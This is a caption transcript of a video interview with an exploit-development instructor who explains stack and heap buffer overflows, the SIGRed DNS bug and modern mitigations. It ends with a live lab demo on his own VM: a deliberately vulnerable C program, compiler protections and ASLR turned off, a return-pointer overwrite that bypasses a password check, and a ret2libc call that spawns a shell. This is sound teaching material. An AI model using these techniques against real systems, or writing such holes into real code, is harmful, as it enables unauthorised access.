Buffer Overflow Hacking Tutorial (Bypass Passwords)

Video Statistics and Information

Video

Captions Word Cloud

Captions

The point is that shows us about how much bytes we want to send in as an attacker to overrun that buffer. I love that because all the demonstrations I've seen is people are just stuffing it until they somehow get an overrun right? Which is great I mean you can use the pattern tool where you create a pattern and then you cause a process to crash and then a piece of that pattern shows up in the register and then you can ask the tool how many bytes into the pattern was this piece of the pattern and it shows you how like that's the buffer size basically but this is the more elegant way of doing it I guess. So let's override the return Porter of the aggressive system and then a four byte padd and then finally the address of the shell so why have four byte padd because I know someone's going to ask we are returning to the system function that is not how you call a function you don't return to it you call it look at that access granted so we successfully bypass Authentication [Music] Now one of the things I've learned in IT is that you can't stop learning you've got to keep on improving your skills keep on developing your skills and Brilliant are a fantastic platform for that doesn't matter if you want to learn Math, Computer Science, Artificial Intelligence you want to learn Programming they have fantastic content on their website you're not just going to be reading a book as an example or watching videos it's very interactive and you are involved in your learning. I highly recommend Brilliant use the link below to get a 30-day trial and a 20% discount so go to https://brilliant.org/DavidBombal I really want to thank Brilliant for their fantastic partnership and for sponsoring my channel they really truly are Brilliant. Hey everyone it's David Bombal back with a very special guest Stephen welcome Stephen it's great to have you back just for everyone who hasn't seen our previous video have a look at the link below Stephen's talking about zero day millions and how you can like earn millions by finding a zero day it was a fascinating story lots of cool stories in that video so have a look at that video if you're interested in learning more about Stephen but Stephen just for people who haven't seen our previous video or don't know who you are tell us a bit about yourself and tell us about your channel. Yeah great my name as David mentioned Stephen Sims I'm a stance instructor with the SANS Institute and also the curriculum lead there for the offensive operations curriculum I'm also a courseware author of a few of their courses on like Advanced Pentesting Exploit Development I live out in the Bay Area in California and I've been doing bug hunting and exploit development for probably close to 20 years now time has flown but it's a lot of fun it's something where you never never you never lose your interest you never will know everything. So tell us about your channel because you've started you started that not so long ago right? Yeah so I started it off as like when I retire courseware content from a course through SANS I'm like well this is content that I think people would still enjoy just because we're moving it out and so I reached out to the community and said hey would you all like to see something like browser exploitation against Internet Explorer 11 and people said absolutely so I started doing that way and then continue down like the advanced technical area but it's branched out a bit like I just had one last last Friday on hacking Google Cloud. Yeah so for everyone who's watching we're going to cover well Stephen tell us the topic that we're going to cover I'll just say you know go and look at Stephen's channel for amazing content Stephen is one of the OGs in this field if you really really want to learn go and have a look at his channel and go and subscribe go and show the love but Stephen what are we talking about today? Yeah today we're just going to cover a basic buffer overflows and I think it's important to do that because even if you want to jump in at 2023 or 2024 and get into exploit development you've got to understand the fundamentals even if a lot of those types of attacks are mitigated in many cases. You're telling me offline that buffer overflows have been around forever it's surprising that they're not dead now but there's some news coming right? Yeah so I I will always say that the golden years of exploitation was back in the 90s up into the mid 2000s because there were no mitigations or security controls that were there preventing for exploitation to be possible so even if the vulnerability is still there there are these mitigations that try and stop the actual exploitation for being successful or even your shell code execution so I remember people saying all the way back in the 90s like the day of buffer overflow exploitation is coming to an end any day now and here we are 2023 and it's still possible but yes as you mentioned there are some newer mitigations called Control flow Enforcement Technology or CET as well as Shadows stacks and other mitigations that are even I will say like they are the end of buffer overflows the vulnerability is still there in the code but the ability to actually exploit the vulnerability is pretty much will be mitigated completely once these roll out and if you're on the side of the fence where you don't want to see this stuff go away it's still going to be some time because the actual hardware the processors themselves have to support the mitigations so they're not just going to flip they being Microsoft or other vendors are not just going to flip the switch and make it so they break all of your apps so it's going to be a while. So you mentioned Microsoft is that is that something that's built into Windows or do you have to do something to enable it? Yeah so on Windows it's part of something called exploit guard which used to be called the Enhanced Mitigation Experience Toolkit or EMET uh Exploit Guard came out on Windows 10 at some point it's still there on Windows 11 and it's a I would say mitigation toolkit where the majority of the mitigations and there are over 20 are turned off by default almost all of them because Microsoft doesn't want to hurt everything out and potentially break your application so it's up to an administrator to understand the effect that the mitigations will have both on application performance as well as breaking the app depending on how it's coded. And that's available in Linux and Mac OS as well or is it just a Microsoft thing yeah most Operating System vendors all the big ones have ways to turn this stuff on or off but the each are different in their own way.And is it what's holding it back is it the hardware or the applications or? Yep the world versus Shadow stacks and stuff specifically uh that's held back by the actual hardware the processor architecture. That's great so just for everyone who wants to learn I mean Stephen it's important to learn this like you said it's it's a basic building block right that you need to know so even though this I try to say maybe stop soon um it's something that you need to learn right? Yeah and just because Microsoft might be implementing it doesn't mean that the IoT world and all these other things out there are supporting it. Do I mean I want to keep quiet now and let you take us on this road so perhaps you can just start like a gentle introduction and then go hardcore into it. What is a buffer overflow? Why is it important and I know you know I just want to let you take us down this road I know you said you've got some slides and stuff that you can share so you take it away Stephen. Yeah great thanks and feel free to chime in and ask away um so yeah I did put some slides together a few I want to show you two types of buffer overflows the the first one's going to be the most basic ordinary one that you would see in any college that you attend and go to at some security classes see but the other one I will show you is going to be a more advanced one it's just going to be a screenshot of some disassembly of uh this one I'll show just because it's easy to digest is from the SIGRed vulnerability that came out a couple years ago that affected DNS and that type of overflow is a heap overflow so they're both bought for overflows but ones on the stack and one's on the heap and the second one I'll show you will be more real world and then I also plan on we'll see how it goes to plan on jumping over into command line and we can try and take a look to see if we can see this in a debugger but a buffer overflow and its most basic form is when you're dealing with a function that is being called if that function needs to say copy a string meaning a number of characters into this buffer and interact within the program at that point you have to allocate the appropriate amount of space to store this information so to take a step back each function call that gets made gets its own stack frame so the stack is its own region of memory and again every function call gets a stack frame and some functions will need a buffer and other ones don't need a buffer so the ones that need a buffer you need to allocate memory on the stack and it's a finite lifetime because it's only going to be there during the function call itself once the function returns out then that stack frame gets torn down it's no longer needed so if that function needs a buffer then you'll then have a memory copy operation it could be one of many functions that actually copies the data from a source into the destination buffer that in this case would be on the stack so the problem comes in if there are no balance checks or if we're not checking the size the number of bytes that are going to be copied into the buffer then it is possible for an attacker or just a regular user to inadvertently send more data into the buffer than is available which means that overflow of information has to go somewhere so what is it overwriting. You know this is saying I think Einstein said it you really know when someone knows this stuff when they can explain it simply and you just did that I mean I've been doing a lot of search on this and it's like you just explain it so nicely. So on this slide it's going to be a very basic C program that has a buffer overflow vulnerability intentionally written into it so on the left side where it says encode that would be the code segment this is where the executable code is stored in memory while the program is running while the process is up and running and then over on the right you see on the bottom right it says stack that would be a different location in memory that would specifically be there to store stack frames associated with the various function calls so in the code on the left you see that we're creating a buffer we're calling it buffer it's a character buffer and we're setting it for 16 bytes so 16 total bytes of memory have been allocated on this stack frame associated with this function called overflow so if we continue forward we then have a function called strcpy which is a band function and by that I mean it's antiquated it's unsafe it should never be used anymore but it's still out there in legacy code you will come across so it still has to be supported but you see where it says strcpy buffer so that is the destination first which is that 16 byte buffer that'll be allocated over on the right and then it says input 1 is the source so input 1 is going to be coming in from what we would call the argument vector one so you might have heard of argv and argc that's the argument vector encounter argv[0] is always the program name argv[1] would be the first argument that you pass in via command line and then if you have another argument it's expecting argv[2] think about an example like ping, if you say ping space 127.0.0.1 ping is the program name that would be argv[0] and then your IP address it you use the loop back in that case 127.0.0.1 is the address that we're pinging that would be the argument 1 so in this case whatever the user types in as a command line argument is being taken and written via strcpy into that buffer that we allocated with 16 bytes and if you look at the very bottom you can see we run this program called vuln program and we're using Python to just send in 12 A's and you can see that those 12 A's are being written to memory into that buffer it's being written from the top downward and that's what that arrow means pointing down so we've only written 12 bytes in this case so we're not hurting anything so you wouldn't realize that there's a vulnerability yet in this program because the process is not going to crash if we do this again now you can see on the bottom we do a times 32 so we're writing 32 A's into a 16 byte buffer you can see over on the right we've overwritten everything else that was there notably the return pointer so the return pointer is how the function that we've called in this case it's called the Overflow function it needs to know where to return control after it's done doing what it's supposed to do so we do that by returning to the return pointer there is a special instruction called call so if we're running this program in the main function so we just started up the program and you hit this instruction that says call overflow the call instruction takes the very next address where execution would have continued it pushes it onto memory so that once the function we've called finishes it knows where to return control in this case we've overwritten it with these A's so the process would crash and we get this segmentation fault where the in the instruction pointer or program counter it's also called would show us 414141 because the capital A and ASCII hex is 41. Is there a reason why we choose a or is it just a arbitrary choice? That's a good question and I there's multiple takes on that uh what is that hey it's just the first letter of the alphabet and why not another big part of that is if you see your 414141 showing up anywhere in the process of registers or memory you know that that's your data that you sent in so it's kind of like a little signature but the other reason is that 414141 is typically in a virtual memory address range that is not mapped into the process so therefore if you ever try to read from that address right to that address or execute what's at that address there's a good chance it's not mapped and it will just cause an instant crash. I've seen all the examples it's a so it's great to get a like a real explanation of that rather than people just doing it for whatever arbitrary reason so thanks. No worries so so that's that's in its basic form again if we start over real quick and just summarize we start this program called vuln program it wants an argument so we just send it some A's the main function is the very first function to execute once the process is created you can see here that the main function calls a function called overflow the Overflow function allocates a 16 byte buffer on the stack then strcpy copies whatever command line argument you sent in into that destination buffer on this stack well since strcpy does not include a size argument limiting the number of bytes that are permitted to be written to the destination we can send in as many as we want and when we overrun that buffer we're overriding in this case something called the return pointer which should be how this function knows where to send the process the instruction pointer once it's done to continue execution like it should be but we've overritten it with AAA causing it to crash what the attacker wants to do we would attach to it with a debugger and we want to start understanding if a mitigation such as address space layout randomization is not on which it typically is then we can statically set the return pointer overwrite position so you see on the image here where it says return queer now previously we had AAA which caused it to crash because we try to execute whatever's at memory address or 41414141 in this case we want to overwrite that return pointer with an address in virtual memory where we can send our data so that buffer that was allocated if we can get the address of that then we can put our Shell Code which is our payload we want to have executed like maybe you've heard of interpreter or just command exact Shell Code or add a user there's all different types of Shell Code the two big parts are you've got your vulnerability which you exploit to get control of the process then you've got the Shell Code which serves as your payload which is what you want to execute once you do get control so what we want to do is put our Shell Code into that buffer overwrite the return pointer with the address as to where that shell code is in the buffer than when the process goes to return we get our payload execution that's the goal yeah so that would be a very basic stack Overflow and as the time has gone on and on lots of different mitigations have been put into place to try to make it so you you can't exploit this simple vulnerability so it's not treating the root cause it's treating the symptoms the root cause is the bad coding the symptoms are obviously these types of things that we're able to do so an example of a mitigation would be data execution prevention now this one came out way back in XP Service Pack 2 if we're talking about Windows but it wasn't turned on by default for all processes because Microsoft didn't want to break your programs but what that would do in this case if we overwrite the return pointer with the address of our Shell Code on the stack it would break the exploit because the permission that we need which is execute is turned off with depth being on data execution prevention so that's a pretty effective control there are ways to get around it it's like a cat and mouse game where every time a new mitigation comes out we try to figure out how to get around it or avoid it or disable it. Stephen I always see examples where people using C and using C here again is there a reason why C is used rather than say say Python? Yeah great question so these are low level languages so you've got assembly you've got C++ these are examples of low level languages Objective C is another one and these low-level languages are extremely powerful because you have direct access to processor registers direct access to memory and the power to allocate and deallocate memory and move memory around those low level operations you've heard that term with power comes responsibility right with great power great responsibility something similar to that you have to be very careful if you're rating in a language like C because there's no protection there's no management of the memory that's being allocated and deallocated to protect you such as a higher level language like C# so that's that's kind of the reason behind it and you might say well why would people use these low-level languages if they're dangerous because the speed the speed and power that you have you might compile something and the compiler compiles it to a way that you don't like it is maybe it's inefficient or it's not allowing you to do something that you want to be able to do so in C you can just create some inline assembly right there in your program and you can make it do what you want it to do so you can literally say move this data from this register into this other register and pop this off the stack like it's very powerful so the higher level languages they manage memory for you and other controls and protections to make it impossible or virtually impossible for those primitive or old school type of attacks to be possible. I've heard a lot of people say you should rather use Rust rather than C when coding in like production. Yeah and absolutely Microsoft I'm sure you've been watching they uh just recently a couple months back I think it was Mark Rosinovich or someone said hey if you're interested check out the latest update I think it was a preview version of Windows 10 or 11 and win 32k.sys has some components of it that were are running in Rust now historically you would see win32k.sys which is probably C++ it's a driver but then win32k.rs.sys I think it was that's the Rust version or at least part of that has been rewritten in Rust and the interesting thing about Rust is you get a lot of the speed and power that you need but with these this memory safety that you benefit from with the higher level languages there's a lot to it though it's going to take I mean there's millions of lines of code in let's say Windows Operating System so you can't just overnight swap all that stuff out and another issue you run into are limitations with the language because the language hasn't been around as long and it's not as mature so something that works fine in C++ may not be possible in Rust so they've got to work with the language developers to actually Implement support. But if I was writing an application based on like your experience with exploit development and all of this would you recommend developers today right in Rust when they can rather than C? Yeah absolutely yeah. Because I mean it's so nice to see this example because you know you hear these messages saying learn Rust or program and Rust but I mean this this is like a really nice visual example of why you'd rather use Rust or Python let's say than C and it's great that you've you know given us advantages and disadvantages of each so sorry for taking us on this tension but it's that's great great information thanks. I always say in a classroom you've heard this before millions of times like if you have a question there's a good chance like 10 other people want that same question you got to be the one that reason ahead but yeah there's I mean so many of the browsers and big applications like Adobe Acrobat Reader and whatever editor and then you've got email clients and the operating systems themselves and all these big applications most of them are in C++ and it's because of that power and that speed that you get with that language and you're having to go and now train a lot of Legacy developers who have so much history and experience with C++ and now they've got to learn a new language and that's going to be come with a set of challenges I want to jump over to the command line in a little bit here and and see if we can get ourselves into some trouble so we'll see we'll see what we got are able to make happen but I want to show you one more example of a different type of overflow that I mentioned earlier which is which would be a heap overflow so the Heap is actually a different region of memory than this stack and so when I say different regions like the code segment the stack segment the Heap segment what that really means is you're carving out a different section in virtual memory that's specifically been and reserved and allocated to support one specific thing so the code segment is specifically there to hold the executable code associated with the process so in that case you can mark that region of memory with the execute permission being on because it has to be on but you don't want it to be writable so you turn the right provision off and then all the other segments like the stack to simplify what the stack is the stack segment is a specific region of memory that is used for function calls every function call gets its own stack frame which just means a small little allocation reserved specifically for that function it goes through something called a prologue at the beginning of the function that sets up the stack frame and then at the end of the function you go through an epilogue and that tears down the stack frame and that is all compiler inserted code you as a programmer don't need to care that stack memory again is it's for finite operations for function calls you get in you get out now when you talk about the Heap that's a more dynamic area of memory let me give you a good example so it'll help you understand let's say that you're using Chrome and you're navigating the web and you you go to a website that's actually a PDF document so you're now your browser window viewing a 10megabyte PDF document this stack is not a good area of memory for that because the stack is like really closely tied to the code segment where again every time as the process is running as functions are called that function that gets called gets its own little stack frame and it's just constantly going on and on in the background versus the Heap that would be a good place to store the memory associated with that PDF document that we're looking at because it's not finite the developer of a browser has no idea how long you're going to keep that window open we need to leave that memory stay in use and resident until the user goes to the URL and changes it to the Google home page then we free all of that memory that was being used up by the PDF document so it can be recycled and reused by the process. If I understand right can also be very big files so like hence the example of a 10 Meg PDF or it could be 100 Meg or something right?yeah so so The Heap and the stack are both both considered Dynamic regions of memory that are able to grow and so therefore they don't play nicely together you got to keep them apart from each other because you don't want them colliding into each other so you'll typically see it where the stack and the Heap are multiple gigabytes away from each other and growing towards each other and they should never collide or you'll see them growing away from each other that's how Windows does it so again the Heap is for dynamically allocative memory that doesn't have a finite lifetime the interesting thing about that though is this is another area we're not going to go down the rabbit hole into this but vulnerabilities like hype confusion use after free those are Heap related vulnerabilities when if you're familiar with programming you know what a function does we call it function like maybe we create a calculator function and it wants two arguments give it two numbers and it will multiply them together and return back to you the product that's again the functions just taking those numbers multiplying them displaying the result and returning out so that function call doesn't store or preserve anything that you just did it's just a little template that you can call over and over again to do a very specific thing you get in you get out versus the Heap Heap memory is once it's allocated we maybe maybe we want to create an object you've heard of object oriented programming I'm sure so let's say you want to instantiate an instance of something called the dog class and this dog class to use a silly analogy you can choose the breed of the dog and various attributes such as like the fur color the size of the dog the eye color of the dog those are all the attributes you can select and then you've got the methods or functions like sit roll over lay down speak and when you instantiate an instance of this dog you can then reference that dog the object and say dog dot speak or dog dot sit and that instance of that object will do those things you're telling it to do and you can instantiate as many instances as you want this all lives out on the Heap it gets very complex because something has to manage that memory and manage those objects so that this vulnerability class called use after free for example if we're somehow able to trick the process into thinking that that object is no longer needed and it destroys it and gives it back to the Heap what if the process still needs it it goes to access that object that's supposed to be there oof it crashes so it gets very complex out there on the Heap but this example I'm going to show you and what we're looking at here and I know it's a lot of a lot of junk it looks like seemingly this is a disassembled program a little small piece of a function of a disassembled executable specifically it's dns.exe from Windows this is a a piece what we're looking at is where the vulnerability resides from SigRed if you heard of that vulnerability from a number of years ago it was a a very critical vulnerability because it affected DNS which is a a publicly accessible service so obviously from an attacker's perspective that's very interesting the researchers that discovered this vulnerability were from checkpoint on the left we've got a snippet of one function and on the right we've got a snippet of another function the snippet on the right is called by the snippet on the left so see I'm using my mouse cursor I know it's small see where it says call RR allocateEx the little snippet on the right is RR allocateEx disassembled so what does disassemble mean that means when we've compiled a program the kind that you double click on to get it to run that's all in machine code so it's basically hexadecimal and that hexadecimal that you're looking at are opcodes and operands so that's you know what the processor uses obviously for us that's not easy to read a bunch of opcodes like 90 eb06 34 41 I mean that's pretty crazy so what a disassembler does is it takes those opcodes it disassembles them into their mnemonic representation which is what you have here on the screen called disassembly it's still not easy to read this is very low level what we're looking at this would be an example of x86 64-bit disassembled code so I put some notes these little a little bit of blue on the right everywhere that's comments that I added in but I'm not going to take like I'm just going to really quickly show you what the issue here was you you can see down at the very bottom call memcpy memcpy is a function that has a size argument so you would think if it's got a size argument we can specify the maximum number of bytes that are permitted to be written to the destination preventing above overflow so strcpy didn't have that option there was no size argument memcopy does so how will there be a vulnerability let's talk about this because this gets it's where it gets complex not what we're going to talk about here but what gets complex is the calculation of that size argument because oftentimes we can't statically specify what the size is so it has to be calculated from something else and that's something else unfortunately oftentimes is user influenceable that's a word we can influence that calculation now to be able to influence that calculation can be quite complex and that's where the research comes in but what's going on here is there was a special DNS query type that that DNS query type allowed for you to do interesting things like normally DNS runs over UDP Port 53 but DNS can also run over TCP 53 that would allow us to increase the size and and have um you know ACK and SYN ACK and stuff like that like it increases some options and this specific type of DNS query through compression and other factors allows you to massage or groom how much data ends up needing to be copied to a destination so this call to RR_AllocateEx if you look in towards the bottom on the right it says call Mem_Alloc that's the actual function that allocates the memory on the Heap to store the data associated with this DNS query so we've got to allocate memory to store the data associated with this DNS query coming in across a socket so the issue that happens here is if you look and maybe you can add an app to the fact a little pointer here it says movzx dx into edi movzx dx into edi movzx cx into esi, dx and cx those are two byte processor registers two bytes so 2 to the 16th power maximum 65,535 max only the lower two bytes of this processor register are being taken into consideration for the memory allocation, so in other words the maximum memory allocation can be 65,535 that's the max because of this vulnerability in the code it should not be limiting to only 2 bytes but it is and what happens is we get into trouble because there's something called an integer overflow if you've ever looked at an odometer and the odometer says 999999999 when you add 1 to that what happens it rolls over back to zero or does it really those digits roll over to zero but it carries the 1 to the left right so the that ends up becoming the issue if we can cause an integer overflow rolling over 2 to the 16th power back to zero again the memory allocation that gets made because it's only looking at the lower two bytes ends up being really tiny meanwhile if we go back to the caller mem copy is what actually needs to copy the data to that destination buffer that's been allocated mem copy takes in a unsigned 32-bit integer so four bytes are taken into consideration not just two so you see where I'm going so what's going to happen there is mem copy will happily copy in way more than 2 to the 16th power to the destination buffer that wasn't capable of ever holding that much data so it results in a heap overflow and that's where we got into trouble here. And that occurred on the server right or was it the so the client was able to get overflow on the server? Yep there was a server side vulnerability so as you can see just just from that explanation and I try to simplify it as much as possible but just based on that that information you can see how much work complex it is. Now I love I love how you're explaining those Stephen I mean I can see number one that you train a lot of people and number two you really understand this because you're explaining it simply even though it's complex I appreciate you doing that. Yeah for sure it's it's a lot of fun I mean even though a lot of these vulnerabilities end up getting mitigated they get patched of course but the folks at Microsoft like uh Matt Miller who is the guy who wrote the original interpreter module works at Microsoft now for a long time he's one of the guys responsible for implementing and creating these mitigations that make those types of exploit techniques not possible what I want to do now if we have time to do so is jump over the line and just take a look at what this would look like in the code it might not let us do it but we'll give it a shot all right so we're in command line right now I'm on this just Ubuntu Virtual Machine and what I want to do is try to create a little program and intentionally cause it to have a buffer overflow vulnerability let's go vuln that sounds good that's it and then we use vim and now we're going to go ahead and start coding it up so I'm probably going to add more than I need but I don't want to have to deal with many compiler errors so we'll just add in the appropriate um support that we need so stdio and then it will include a couple more I don't know if I'm going to need them or not but better to put them in than not stdlib close that out so these are the headers that I need for this and then I'm going to create a static password in here you would never do this in the real world but to find a password and we'll call it password because that's a great password of course and then I'm going to start the main function so int main int and so here's what I'm going to do argc that's the argument counter and I talked a lot about this a bit earlier and then we'll also do argv and if you remember argc is the counter argv is the vector and argv[0] is always a program name so that's what we'll start with there so let's jump into the main function here and the main function I don't know what my ID is current currently let me see if I can check that real quick so my ID is 1000 I should have guessed that all right so I'm going to say set uid because what happens a lot of times is a process will drop your privileges so I'm going to set it back probably don't need this normally this would be the case if I want to make sure it runs as root but I'm not going to mess with that right now so we've got the setuid if that works for us if and then I'll say argc I'm only putting this in to help you understand if you're not familiar with C very well like no argument Vector because I'm sure you've seen um when you run a program if it wants command line arguments it yells at you and says hey I won't mail an arguments or maybe it doesn't like command line arguments so this program I'm going to make it so it doesn't want commandment arguments actually so we'll skip the argument Vector part but I'll still put it in here so char and what I'm going to do here is say if the actually that's not what I want if the argument vector is greater than one so I don't want any arguments in this program so if the argument counter is greater than one then I'm just going to give it a usage statement print F there is no usage let's put that in there and the reason again I'm putting that in there is because it should help you see kind of how the argument vector and calendar works again argument v[0] is the program name argv[1] would be the argument that you sent in the very first one I don't want any so somebody tries to send an argument I'm going to yell at them and say hey there's no usage not terribly excited. I mean keeping it simple which is great. Yeah so all right we've got that knocked out and then we can say if that happens we'll exit little one meaning an error and it will close out so that's a little check to see if you did in an argument and now I'm just going to call the vulnerable function or the function with the vulnerability that haven't created yet I'm going to call it check password checkpw and it doesn't want any arguments return zero if we don't have any issues and then close out next we got to create the vulnerable issue of vulnerability so I'm going to create a function called checkpw and then we go into this function it's going to say printf please enter the password or say yes this is the vulnerability I'm using the gets function you should never use that function because it doesn't have a size argument so I'm saying gets(pw) and then inside of here we're going to say if string compare the password is password then call to grab the function and we haven't created that function yet else we're going to say printf after access denied I'll close that out let me just think here real quick I'm gonna return zero and then close this functionality one more function called granted and this function will simply say printf if you reach it then printf access granted and then preparing zero close that out and that should be our whole our whole program so if we walk through that again we've got the main function is the first thing that I'll execute it tries to set the uid back to 1000 which should be fine and then it says if the argument counter is greater than one meaning if someone entered in any argument print out a message that says there's no usage and exit out with an error of what zero would be no error one is an error as a status code well if there is no arguments call the check pw function the check pw function says please enter a password gets pw so it's going to prompt us for standard input to enter in a password it comes in it says go ahead and compare the password which is basically just the string password against what we sent in if it's zero meaning they were equal if they matched then call the access granted function that will print up access granted otherwise print access denied and return out it's a pretty simple little program but it's got a buffer overflow because this guy here doesn't have a size argument so I've only allocated a very small buffer have I even done that yet let me see here nope I forgot to do that glad I went through that and actually read through that because it wouldn't have worked. I love it when most of people like yourself make mistakes it's encouraging for the rest of us. Especially in very basic things like this character pw we're gonna make it a 100 byte buffer all right let's be good all right so there's a little program let's see if we can get it to compile now that's going to be the question it might block us but we'll try all right let's do uh I'm gonna make it just a 32-bit executable right now to keep things simple gcc -m32 now I'm going to put in some mitigation uh m32 means compile is a 32-bit binary but I'm gonna I'm gonna kill some mitigations that would otherwise be automatically added in so I'm going to say -z is execstack which turns off death and then also -fno-stack protector I think that's what it needs to be that says turn off stack canaries and then the program name is vuln.c we'll just call it vuln it's going to yell at us it says it doesn't did you mean fno stack oh I put in one extra um hyphen all right did it compile so it's yelling at us it says there at the bottom the guess function is bad don't use it well we just ignore that I'll get it let's see if it actually compiled and it did so works as expected now we know there's a vulnerability like so to show you that argument vector thing if I try to enter an argument it's saying there's no usage because I enter that in and if you look at the disassembly it's really easy to to spot that and you know exactly where you are in the code because it's doing a little check now we know this 100 byte buffer so here's something cool I want to show you which is how can you determine the buffer size through reverse engineering as opposed to just cramming in a bunch of data with a pattern or something like that so what we could do is go GDB GDB is the GNU debugger and it's a debugger that supports four trans C and C++ written by Richard Stallman many many decades ago it's a command line debugger that's not very friendly or intuitive but there are things to help you can get a front end to it like a graphical front end with DDD or EDD but uh we're using an extension called gef you can see down at the bottom that's a exploit development assistant tool that has a bunch of functionality that comes along with it Imports it into the debugger so we can take advantage of it so I'm just going to say disassemble me now defaulting to something called the Intel disassembly syntax GDB by default uses what's called AT&T syntax basically it swaps the operand position and does some other things but it doesn't really affect the program of the behavior it's just uh how you as the person reversing would like to see the disassembly displayed nothing more than that so by looking in this disassembly some things stick out like right there exit well we know what the exit function does and we even put that in there we said return zero and exit uh puts that's the put string function that just prints to the screen so something stick out pretty uh quickly as you're looking in here there's that set uid remember we tried to set the uid to 1000 so this 3e8 is very likely 1000 in hexadecimal being pushed onto the stack as an argument to the set uid function now this function checkpw we know that that's the one that's got the vulnerability in it because that's where I put the gets function call so if we say disassemble checkpw when we scroll up here there's that call to gets right above it so gets needs the destination address where it's supposed to write the data that works type in it needs to know where to write it so we have to give that to the gets function as an argument this is how we're going to determine the buffer size so this right here it says ebp -6c that ends up being upper size because the ebp is the extended base pointer that's a stack register and basically by what it's saying there is take the address of the base pointer that points to the base of the stack frame minus the buffer size and that's how it tells the guess function where to write the data but for us it tells us the buffer size so we could real quickly say something like shell python minus C and then I'll just say print and then what was that size again that was 6C right so per print 0x6c and let me close that out and it says 108. so if you remember the buffer size that we created was a hundred bytes right so there are other things that might be playing a role here making it a little bit bigger but the point is that shows us about how much how many bytes we want to send in as an attacker to overrun that buffer. I'll just I just want to interrupt you and say I love I love that because all the demonstrations I've seen is people are just stuffing it until they somehow get an overrun right. Which is great I mean you can use the pattern tool where you create a pattern and then you call it the process to crash and then a piece of that pattern shows up in the register and then you can ask the tool how many bytes into the pattern was this piece of the pattern and it shows you how like that's the buffer size basically but this is the more eloquent way of doing it I guess so we're gonna say run python minus C print A times I'm going to put 100 so 100 days plus I'm going to put in me BBBB plus CCCC plus DDDD and the reason I'm doing this is because we know that if we see 41414141 that that's A's if we see 42424242 that's B's if we see 43s at C's you get you get where I'm going so I'm going to run this what I'm hoping for is that it crashes and we see some of those values appearing in the register to help us let's see what happens. So right here it says 56556202 and we're at this interesting memory address something's obviously went wrong here you can see that the base pointer points to DDD the instruction pointer points to this strange address so what this is telling me is that I'm not seeing 4141 or 4242 or 43 or 44 showing up in the instruction pointer because the instruction but if I successfully overwrite that return pointer then the instruction pointer should be pointing to those values because it tried to return to that as an address so I'm going to run this again but actually send in four more bytes so plus EEEE you run this again and now look what it says cannot access memory at 45454545 so the instruction pointer actually did return to that address as if it were real so pretty neat correct if we go back over to the slides here what we essentially did is send in a bunch of data and that return pointer down there is what we wanted to overwrite so by cramming in enough data we eventually were able to override it with our Es so now we have control of the pro the process we can tell it to go wherever we want it to go this ends up giving it to run a shallow sorry yeah we should be able to get it to run a shell if I had Shell Code or something like that what I'm going to try and do and see if it lets me is maybe I can return back to the access granted function somewhere I'm not supposed to be able to return to bypass authentication the issue is I didn't compile this as a position independent executable it's got ASLR on so it might not let us do this but we'll give it a shot we'll see what happens here if I disassemble checkpw so these addresses should be routed consistent what I want to do is overwrite that return pointer with this address here so that when it returns it returns to the call to the granted function allowing me to bypass authentication see how that would work so let's see if we can get it to work though I'm going to take my input here so instead of EEEE in a little endian format because x86 is little endian architecture which means it writes the bytes in reverse order and memory so we have to write the address in backwards so that it actually writes in forwards in the right order so 36\x62 by the way if you're busy that means base 16 hexadecimal 55\x56 so I've now written that address that I have highlighted in a little endian format that will overwrite this position here where it says return pointer if it works will return to the granted function called bypassing authentication so let's see what happens here I'm going to let it go and it says stopped checkpw sigfault but we're in the checkpw function so if I go up top here look it up access granted so we successfully bypass authentication now we we could have overridden that with a a call to a function or something like that like that's one cool technique to get around ASL I mean data execution prevention there's a technique called Ret2libc it's an older technique but it works quite well where if inside the debugger we say print uh let's see here how about we print system what this is showing us is the address of the system function so if I can return to the system function I might be able to pass it something like an environment variable like pop a shell like slash business sh something like that there might be some cool opportunities there so we have a lot of options which is nice well one thing I just noticed here is I don't know why this shell is here this environment variable is in there but this says shell equals bin bash so we might be able to return to that address if we return to system and pass it the argument of bin bash it might pop a shell which would be interesting let me see if I can print that string out in memory though so I'm going to say x/s that says is a string and then I'm going to give it a memory address so 0xffffd098 so that's showing us not what I was hoping to see let's try this address here though so x/s examine as a string 0xffffd337 so shell equals bin bash so we need to go a little forward here how about 3a LL how about 3c 3d so bin bash is at this memory address so if we overwrite the return pointer with the address of system and pass it this address is an argument it might pop a shell it might not but we're going to try it because why not so let's override the return pointer of the address of system which I'll highlight real quick it's that guy so xa0 x05E2F7 and then a four byte padd and then finally the address of the shell so why have four byte padd because I know someone's going to ask we are returning to the system function that is not how you call a function and you don't return to it you call it remember the first thing that call instruction does it pushes the return pointer onto the stack so this padd that I'm putting there is literally where system will return to when it gets done executing my my command so that's it's expecting the return board to be at that position in memory so we're just putting padd it'll crash but hopefully it'll pop my show first so let's see if we can make that work I'm going to put in this address now which is the address of the bin bash so x3d\xb3\xff\xff and then let's cross our fingers at a seg fault it I don't know if I got a shell or not oh yeah we did look see that detaching after v4 control process so it did pop a shell just didn't follow the fork so that's pretty cool it did actually pop the shell but here the thing is it still crashed though didn't it let's fix that so it doesn't crash and it crashes gracefully print the address of the exit function so instead of the padd I'm going to put the address of the exit function in there so when it returns it exits cleanly and it doesn't put a log in you know that we would see with d message so now I'm going to put this address in and we'll say x90\x36\xe1\xf7 now when I run it I'm hoping it doesn't crash it's still says no it did crash anyway I wonder why it did that trap adjust sign trap interrupt direction soon virtual still did the fork but for whatever reason I think it's because we're in a debugger but normally that would let us exit out cleanly. So you would have popped a shell and then you would have basically got access right? Yeah yeah that totally that's it's just not far enough for it I'll try it outside the debugger real quickly but ASLR is on so I don't know if it's gonna work but it's okay we'll give it a shot let's copy this why isn't it let me copy that maybe it did all right let's so what I just looked at there is randomized VA space that's the setting for ASLR I'm going to try and turn that off right now since we're not going through a just you know defeating ASLR session right now that's jumping ahead I think for everyone who's watching let us know in the comments the kind of stuff that you want to see Stephen's got so much knowledge and I mean this is just the beginning so let us know the kind of stuff that you want to see echo 0/proc/sys/kernel that's the crazy thing is you can turn off ASLR so easily on a Linux box on Windows you can't do that all right so now let's try to run the exploit again I don't think it's going to be happy all right so here's something interesting we try to run this outside of the debugger and notice it's saying not found saying that this crazy thing here is not found what's happening is it's actually working so system is actually trying to execute our command and that's why a shell is printing out this crazy stuff but the memory layout outside the debugger is different than inside the debugger so I'm going to try one last thing to see if I can get this to work export I'm gonna create an environment variable now look let's see if we can find it but let's see export and then we're going to call it SYS equals that's the name of my environment variable and I want it to simply say bin bash and if I can find that environment variable in memory then it will execute that let me see if I can find it here, so that's 